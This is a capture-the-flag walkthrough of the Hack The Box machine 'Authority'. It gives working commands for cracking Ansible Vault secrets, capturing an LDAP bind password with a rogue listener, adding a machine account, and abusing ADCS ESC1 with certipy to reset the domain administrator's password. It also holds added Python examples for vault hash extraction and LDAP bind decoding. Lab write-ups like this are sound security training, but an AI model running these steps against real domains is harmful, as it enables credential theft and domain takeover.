Authority

Pasted image 20250807212703.png

1. Foothold & User

1.1. Information Gathering

1.1.1. Port Scan

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# nmap 10.10.11.222 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 09:35 EDT
Warning: 10.10.11.222 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.222
Host is up (7.9s latency).
Not shown: 34783 filtered tcp ports (no-response), 30732 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
8443/tcp  open  https-alt
9389/tcp  open  adws
49664/tcp open  unknown
49665/tcp open  unknown
49690/tcp open  unknown
49691/tcp open  unknown
49703/tcp open  unknown
49711/tcp open  unknown
51539/tcp open  unknown
51590/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 110.60 seconds
┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# nmap 10.10.11.222 -p 53,80,135,139,445,464,593,636,3269,5985,8443,9389 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 09:37 EDT
Nmap scan report for 10.10.11.222
Host is up (0.38s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2025-08-07T17:14:52+00:00; +3h35m50s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2025-08-07T17:14:52+00:00; +3h35m50s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8443/tcp open  ssl/http      Apache Tomcat (language: en)
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2025-08-05T17:02:34
|_Not valid after:  2027-08-08T04:40:58
|_ssl-date: TLS randomness does not represent time
|_http-title: Site doesn't have a title (text/html;charset=ISO-8859-1).
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3h35m49s, deviation: 0s, median: 3h35m49s
| smb2-time: 
|   date: 2025-08-07T17:14:45
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.60 seconds

1.1.2. SMB

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# nxc smb authority.htb -u guest -p '' --shares
SMB         10.10.11.222    445    AUTHORITY        [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.222    445    AUTHORITY        [+] authority.htb\guest: 
SMB         10.10.11.222    445    AUTHORITY        [*] Enumerated shares
SMB         10.10.11.222    445    AUTHORITY        Share           Permissions     Remark
SMB         10.10.11.222    445    AUTHORITY        -----           -----------     ------
SMB         10.10.11.222    445    AUTHORITY        ADMIN$                          Remote Admin
SMB         10.10.11.222    445    AUTHORITY        C$                              Default share
SMB         10.10.11.222    445    AUTHORITY        Department Shares                 
SMB         10.10.11.222    445    AUTHORITY        Development     READ            
SMB         10.10.11.222    445    AUTHORITY        IPC$            READ            Remote IPC
SMB         10.10.11.222    445    AUTHORITY        NETLOGON                        Logon server share
SMB         10.10.11.222    445    AUTHORITY        SYSVOL                          Logon server share

An SMB null session is available, and the guest account has read access to the Development share.

Connecting to take a look:
Pasted image 20250807222258.png
There are four directories; let's check them one by one.

  • ADCS directory: Pasted image 20250807222329.png
  • LDAP directory: Pasted image 20250807222350.png
  • PWM directory: Pasted image 20250807222442.png
  • Share directory: Pasted image 20250807222524.png

1.1.3. WEB

IIS: Pasted image 20250807215118.png
Directory scan

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# dirsearch -u http://10.10.11.222/ -x 403 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/htb/Authority/reports/http_10.10.11.222/__25-08-07_09-52-29.txt

Target: http://10.10.11.222/

[09:52:29] Starting: 

Task Completed

No results. One could try a larger wordlist at this point, but it probably would not help much.

1.1.4. HTTPS 8443

Pasted image 20250807220133.png
This ssl/http service is HTTPS.

After opening it, the site redirects to /pwn/private/login

PWM is an open-source password self-service application for LDAP directories.

Pasted image 20250807220210.png
Clicking Configuration Manager takes you to this page. Below it are some authentication records, in which the username svc_pwm can be found.
Pasted image 20250807220316.png
At the top there is only a single configuration password prompt.
Entering an arbitrary password returns an "incorrect" message.
Pasted image 20250807220406.png

Since the PWM directory is reachable anonymously over SMB, let's check whether it holds anything useful.

1.2. Cracking the Ansible Vault Hashes

The site's password can be found in defaults/main.yml

┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# cat main.yml                         
---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"

pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true

pwm_require_ssl: false

pwm_admin_login: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          32666534386435366537653136663731633138616264323230383566333966346662313161326239
          6134353663663462373265633832356663356239383039640a346431373431666433343434366139
          35653634376333666234613466396534343030656165396464323564373334616262613439343033
          6334326263326364380a653034313733326639323433626130343834663538326439636232306531
          3438

pwm_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          31356338343963323063373435363261323563393235633365356134616261666433393263373736
          3335616263326464633832376261306131303337653964350a363663623132353136346631396662
          38656432323830393339336231373637303535613636646561653637386634613862316638353530
          3930356637306461350a316466663037303037653761323565343338653934646533663365363035
          6531

ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          63303831303534303266356462373731393561313363313038376166336536666232626461653630
          3437333035366235613437373733316635313530326639330a643034623530623439616136363563
          34646237336164356438383034623462323531316333623135383134656263663266653938333334
          3238343230333633350a646664396565633037333431626163306531336336326665316430613566
          3764  

This file contains Ansible Vault-encrypted values. Looking at the hashcat wiki, the blob does not match any hash format directly.
Pasted image 20250807231154.png

You can use john to generate the hash values.

You need to extract each vault blob into a format from which the hash can be computed.

┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# cat pwm_admin_login.hash 
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# cat pwm_admin_password  
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531
                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# cat ldap_admin_password 
$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764

Then compute the hashes

┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# ansible2john ldap_admin_password 
ldap_admin_password:$ansible$0*0*c08105402f5db77195a13c1087af3e6fb2bdae60473056b5a477731f51502f93*dfd9eec07341bac0e13c62fe1d0a5f7d*d04b50b49aa665c4db73ad5d8804b4b2511c3b15814ebcf2fe98334284203635
                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# ansible2john pwm_admin_login.hash 
pwm_admin_login.hash:$ansible$0*0*2fe48d56e7e16f71c18abd22085f39f4fb11a2b9a456cf4b72ec825fc5b9809d*e041732f9243ba0484f582d9cb20e148*4d1741fd34446a95e647c3fb4a4f9e4400eae9dd25d734abba49403c42bc2cd8
                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# ansible2john pwm_admin_password 
pwm_admin_password:$ansible$0*0*15c849c20c74562a25c925c3e5a4abafd392c77635abc2ddc827ba0a1037e9d5*1dff07007e7a25e438e94de3f3e605e1*66cb125164f19fb8ed22809393b1767055a66deae678f4a8b1f8550905f70da5

These three are hashes that hashcat can recognise.
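As an added example (not from the original write-up, nor Ansible's or John's own code), the following Python reproduces what ansible2john does with the ldap_admin_password blob from defaults/main.yml above: it hex-decodes the vault body, splits it into the salt, the HMAC-SHA256 tag and the AES-CTR ciphertext, sanity-checks the AES256 layout, and prints the $ansible$ line in the field order hashcat expects.

```python
"""Parse an Ansible Vault 1.1/1.2 AES256 payload into salt / HMAC / ciphertext.

Added example; it mirrors ansible2john's field handling for the blob found in
PWM/defaults/main.yml so the layout behind the $ansible$ hash line is visible.
"""
import binascii

# The ldap_admin_password blob as it appears in the write-up's defaults/main.yml.
LDAP_ADMIN_PASSWORD_VAULT = """$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764
"""


def parse_vault(text):
    """Return (salt_hex, hmac_hex, ciphertext_hex) from vault text.

    Layout: a header `$ANSIBLE_VAULT;<format>;<cipher>[;<vault-id>]` followed by
    hex lines.  Hex-decoding the joined lines yields the ASCII text
    `<salt_hex>\\n<hmac_hex>\\n<ciphertext_hex>`.
    """
    lines = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    header = lines[0].split(";")
    if header[0] != "$ANSIBLE_VAULT" or len(header) < 3:
        raise ValueError("not an Ansible Vault header")
    if header[1] not in ("1.1", "1.2") or header[2] != "AES256":
        raise ValueError("unsupported vault format/cipher: %s" % lines[0])
    try:
        inner = binascii.unhexlify("".join(lines[1:])).decode("ascii")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError("vault body is not a hex-encoded ASCII payload") from exc
    fields = inner.split("\n")
    if len(fields) != 3:
        raise ValueError("expected salt, hmac and ciphertext, got %d fields" % len(fields))
    salt, mac, ct = fields
    # Checks that follow from Ansible's VaultAES256: a 32-byte random salt, an
    # HMAC-SHA256 tag, and PKCS7-padded plaintext encrypted with AES-256-CTR,
    # so the ciphertext is a non-empty multiple of the 16-byte block size.
    if len(salt) != 64 or len(mac) != 64 or len(ct) == 0 or len(ct) % 32 != 0:
        raise ValueError("field lengths do not match the AES256 vault layout")
    return salt, mac, ct


def to_john(name, text):
    """Emit the line ansible2john prints: $ansible$0*0*<salt>*<ciphertext>*<hmac>.

    Note the order: the 16-byte ciphertext comes before the 32-byte HMAC tag,
    which is why the middle field in the page's output is the short one.
    """
    salt, mac, ct = parse_vault(text)
    return "%s:$ansible$0*0*%s*%s*%s" % (name, salt, ct, mac)


if __name__ == "__main__":
    print(to_john("ldap_admin_password", LDAP_ADMIN_PASSWORD_VAULT))
```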

Crack them to recover the plaintext. Note that this password is not the account password but the Ansible Vault password.
Pasted image 20250807232141.png
All three vault passwords are the same: !@#$%^&*

You can use the ansible-vault tool with the vault password to decrypt the plaintext values.

On Kali, simply typing ansible-vault offers to install it.

┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# ansible-vault decrypt ldap_admin_password 
Vault password: !@#$%^& 
Decryption successful
                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# cat ldap_admin_password 
DevT3st@123                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# ansible-vault decrypt pwm_admin_login.hash 
Vault password: !@#$%^& 
Decryption successful
                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# cat pwm_admin_login.hash                  
svc_pwm                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# ansible-vault decrypt pwm_admin_password  
Vault password: !@#$%^& 
Decryption successful
                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# cat pwm_admin_password                  
pWm_@dm!N_!23  

We now have a credential pair, svc_pwm / pWm_@dm!N_!23,
plus an LDAP administrator password, DevT3st@123

1.3. Capturing LDAP Traffic

The password pWm_@dm!N_!23 logs us into the Configuration Manager
Pasted image 20250807233408.png

In the LDAP directory connection settings there is an account, svc_ldap, and the password field shows as already saved, but the value itself is not visible in the web page.
Pasted image 20250807233704.png

There is a Test LDAP Profile button.
Clicking it shows a connection error: the configured LDAP URL cannot be reached.
Pasted image 20250807233818.png

I can open a listener on the default LDAP port locally and make the application connect to it.

Port 389 is used here, because 636 is the LDAPS port: that connection would be encrypted and could affect what I receive.

I added an LDAP URL pointing at my own address, started the listener, and clicked Test LDAP Profile again.
Pasted image 20250807234231.png

Some data arrives at the listener:
Pasted image 20250807234245.png
The trailing content is probably the password, but it is hard to read here.

I tried capturing the traffic with tcpdump instead

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# tcpdump -i tun0  -w ldap.pacp
tcpdump: listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
^C25 packets captured
25 packets received by filter
0 packets dropped by kernel

Then inspect the capture with Wireshark
Pasted image 20250807235228.png
Filtering on the ldap protocol, a string that looks like a password is visible:
lDaP_1n_th3_cle4r!

Verify it
Pasted image 20250807235817.png
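The capture above shows why a plain ldap:// URL leaks the bind password: LDAPv3 simple authentication sends it as an octet string inside the BindRequest, so anyone who can read the TCP stream reads the secret. As an added example (not from the original write-up, PWM or Wireshark), the Python below builds and decodes such a BindRequest in BER and labels it the way a monitoring rule would; svc_ldap@authority.htb and s3cret-example are constructed sample values.

```python
"""Spot cleartext LDAP simple binds, the traffic the page captured on tcp/389.

Added example, not part of the original write-up.  Encodes and decodes the
RFC 4511 BindRequest by hand so the wire format is visible.
"""


def _tlv(tag, body):
    """BER-encode one tag-length-value (short or long-form definite length)."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    len_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(len_bytes)]) + len_bytes + body


def _read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the BER element starting at buf[pos]."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        n = first & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    else:
        length = first
    if pos + length > len(buf):
        raise ValueError("truncated BER element")
    return tag, buf[pos:pos + length], pos + length


def build_simple_bind(message_id, name, password):
    """Encode an LDAPv3 BindRequest with simple authentication.

    message_id is assumed to fit in a single byte (1..127) for this example.
    """
    bind = (_tlv(0x02, bytes([3]))            # version INTEGER 3
            + _tlv(0x04, name.encode())       # name LDAPDN (OCTET STRING)
            + _tlv(0x80, password.encode()))  # authentication simple [0]
    return _tlv(0x30, _tlv(0x02, bytes([message_id])) + _tlv(0x60, bind))


def parse_bind_request(data):
    """Decode an LDAPMessage; return a dict for BindRequests, else None."""
    tag, msg, _ = _read_tlv(data, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    _, msg_id, pos = _read_tlv(msg, 0)
    tag, op, _ = _read_tlv(msg, pos)
    if tag != 0x60:                  # [APPLICATION 0] is BindRequest
        return None
    _, version, pos = _read_tlv(op, 0)
    _, name, pos = _read_tlv(op, pos)
    auth_tag, auth, _ = _read_tlv(op, pos)
    # [0] simple carries the password itself; [3] sasl carries a mechanism exchange.
    mechanism = {0x80: "simple", 0xA3: "sasl"}.get(auth_tag, "unknown")
    return {
        "message_id": int.from_bytes(msg_id, "big"),
        "version": int.from_bytes(version, "big"),
        "name": name.decode("utf-8", "replace"),
        "mechanism": mechanism,
        "password": auth.decode("utf-8", "replace") if mechanism == "simple" else None,
    }


def classify_bind(data, tls):
    """Label a bind the way a detection rule would, without echoing the secret."""
    bind = parse_bind_request(data)
    if bind is None:
        return "not-a-bind"
    if bind["mechanism"] != "simple":
        return "%s-bind" % bind["mechanism"]
    if not bind["password"]:
        return "anonymous-bind"
    return "simple-bind-over-tls" if tls else "cleartext-simple-bind"


if __name__ == "__main__":
    # Constructed sample of what the PWM "Test LDAP Profile" bind looked like.
    sample = build_simple_bind(1, "svc_ldap@authority.htb", "s3cret-example")
    print(sample.hex())
    print(classify_bind(sample, tls=False))
```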

1.4. BloodHound

Straight on to BloodHound

Warning
  • Because the target does not expose LDAP (389), collection with bloodhound-python and rusthound both error out.
  • You have to specify the LDAPS (636) port instead.
  • Collecting with nxc does not produce the error.
┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# rusthound-ce --domain authority.htb -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -c All --zip --ldaps 
---------------------------------------------------
Initializing RustHound-CE at 12:06:29 on 08/07/25
Powered by @g0h4n_0
---------------------------------------------------

[2025-08-07T16:06:29Z INFO  rusthound_ce] Verbosity level: Info
[2025-08-07T16:06:29Z INFO  rusthound_ce] Collection method: All
[2025-08-07T16:06:29Z INFO  rusthound_ce::ldap] Connected to AUTHORITY.HTB Active Directory!
[2025-08-07T16:06:29Z INFO  rusthound_ce::ldap] Starting data collection...
[2025-08-07T16:06:29Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-07T16:06:30Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=authority,DC=htb
[2025-08-07T16:06:30Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-07T16:06:32Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=authority,DC=htb
[2025-08-07T16:06:32Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-07T16:06:36Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=authority,DC=htb
[2025-08-07T16:06:36Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-07T16:06:36Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=authority,DC=htb
[2025-08-07T16:06:36Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-07T16:06:36Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=authority,DC=htb
[2025-08-07T16:06:36Z INFO  rusthound_ce::api] Starting the LDAP objects parsing...
[2025-08-07T16:06:36Z INFO  rusthound_ce::objects::domain] MachineAccountQuota: 10
[2025-08-07T16:06:36Z INFO  rusthound_ce::objects::enterpriseca] Found 13 enabled certificate templates
[2025-08-07T16:06:36Z INFO  rusthound_ce::api] Parsing LDAP objects finished!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::checker] Starting checker to replace some values...
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 5 users parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 60 groups parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 1 computers parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 3 ous parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 3 domains parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 3 gpos parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 74 containers parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 1 ntauthstores parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 3 aiacas parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 3 rootcas parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 1 enterprisecas parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 37 certtemplates parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 3 issuancepolicies parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] .//20250807120636_authority-htb_rusthound-ce.zip created!

RustHound-CE Enumeration Completed at 12:06:36 on 08/07/25! Happy Graphing!

1.5. WinRM

Pasted image 20250808001411.png
Pasted image 20250808001509.png

2. System

2.1. ESC1

Pasted image 20250808001545.png
The current user can enroll in many templates and also has Enroll rights on the CA.

Scan with certipy

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# certipy-ad find -u svc_ldap -p lDaP_1n_th3_cle4r! -dc-ip 10.10.11.222 -vulnerable -stdout 
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Finding issuance policies
[*] Found 21 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'AUTHORITY-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'AUTHORITY-CA'
[*] Checking web enrollment for CA 'AUTHORITY-CA' @ 'authority.authority.htb'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : AUTHORITY-CA
    DNS Name                            : authority.authority.htb
    Certificate Subject                 : CN=AUTHORITY-CA, DC=authority, DC=htb
    Certificate Serial Number           : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
    Certificate Validity Start          : 2023-04-24 01:46:26+00:00
    Certificate Validity End            : 2123-04-24 01:56:25+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : AUTHORITY.HTB\Administrators
      Access Rights
        ManageCa                        : AUTHORITY.HTB\Administrators
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        ManageCertificates              : AUTHORITY.HTB\Administrators
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Enroll                          : AUTHORITY.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CorpVPN
    Display Name                        : Corp VPN
    Certificate Authorities             : AUTHORITY-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollmentCheckUserDsCertificate
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
                                          Document Signing
                                          IP security IKE intermediate
                                          IP security use
                                          KDC Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 20 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2023-03-24T23:48:09+00:00
    Template Last Modified              : 2023-03-24T23:48:11+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : AUTHORITY.HTB\Domain Computers
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : AUTHORITY.HTB\Administrator
        Full Control Principals         : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Write Owner Principals          : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Write Dacl Principals           : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Write Property Enroll           : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
    [+] User Enrollable Principals      : AUTHORITY.HTB\Domain Computers
    [!] Vulnerabilities
      `ESC1`                              : Enrollee supplies subject and template allows client authentication.

The CorpVPN certificate template is vulnerable to ESC1.
See the documentation: 06 ‐ Privilege Escalation · ly4k/Certipy Wiki · GitHub
and follow the steps there.

Note, however, that our current user svc_ldap cannot enroll in the CorpVPN template.
Pasted image 20250808001545.png

Members of the Domain Computers group, on the other hand, can.
Pasted image 20250808003331.png
1: Create a machine account
First check whether the current user may create computer accounts

nxc ldap authority.htb -u svc_ldap -p  'lDaP_1n_th3_cle4r!' -M maq

Pasted image 20250808003436.png
It can. Use bloodyAD to create a computer account.

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# bloodyAD --host 10.10.11.222 -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -d authority.htb add computer c1trus Admin!
[+] c1trus$ created

2: Request a certificate for the target user

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# certipy req \
    -u 'c1trus$' -p 'Admin!' \
    -dc-ip '10.10.11.222' -target 'authority.authority.htb' \
    -ca 'AUTHORITY-CA' -template 'CorpVPN' \
    -upn 'administrator@authority.htb' -sid 'S-1-5-21-622327497-3269355298-2248959698-500'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 4
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@authority.htb'
[*] Certificate object SID is 'S-1-5-21-622327497-3269355298-2248959698-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

3: Authenticate with the PFX certificate to obtain the target user's hash

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.222'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@authority.htb'
[*]     SAN URL SID: 'S-1-5-21-622327497-3269355298-2248959698-500'
[*]     Security Extension SID: 'S-1-5-21-622327497-3269355298-2248959698-500'
[*] Using principal: 'administrator@authority.htb'
[*] Trying to get TGT...
[-] Got error while trying to request TGT:` Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)`
[-] Use -debug to print a stacktrace
[-] See the wiki for more information
Warning
  • This step fails here.
  • Sometimes a domain controller does not support PKINIT, possibly because its certificate lacks the Smart Card Logon extended key usage (EKU).
  • In most cases, when that EKU is missing, the domain controller returns KDC_ERR_PADATA_TYPE_NOSUPP.
    However, several protocols, LDAP among them, support Schannel, i.e. authentication over TLS.
  • Note that the term "Schannel authentication" comes from the Schannel SSP (Security Support Provider), Microsoft's SSL/TLS implementation on Windows, so Schannel authentication is essentially SSL/TLS client authentication.

See this article for the details: Certificates and Pwnage and Patches, Oh My! | by Will Schroeder | Posts By SpecterOps Team Members

2.2. PTC

Here certipy can open an LDAP shell as the domain administrator directly, and the domain administrator's password can then be changed from there.

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# certipy auth -pfx administrator.pfx -dc-ip "10.10.11.222" -ldap-shell 
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@authority.htb'
[*]     SAN URL SID: 'S-1-5-21-622327497-3269355298-2248959698-500'
[*]     Security Extension SID: 'S-1-5-21-622327497-3269355298-2248959698-500'
[*] Connecting to 'ldaps://10.10.11.222:636'

[*] Authenticated to '10.10.11.222' as: 'u:HTB\\Administrator'
Type help for list of commands

# 

# whoami
u:HTB\Administrator

# change_password administrator Admin123!
Got User DN: CN=Administrator,CN=Users,DC=authority,DC=htb
Attempting to set new password of: Admin123!
Password changed successfully!

Pasted image 20250808005426.png

Pasted image 20250808005518.png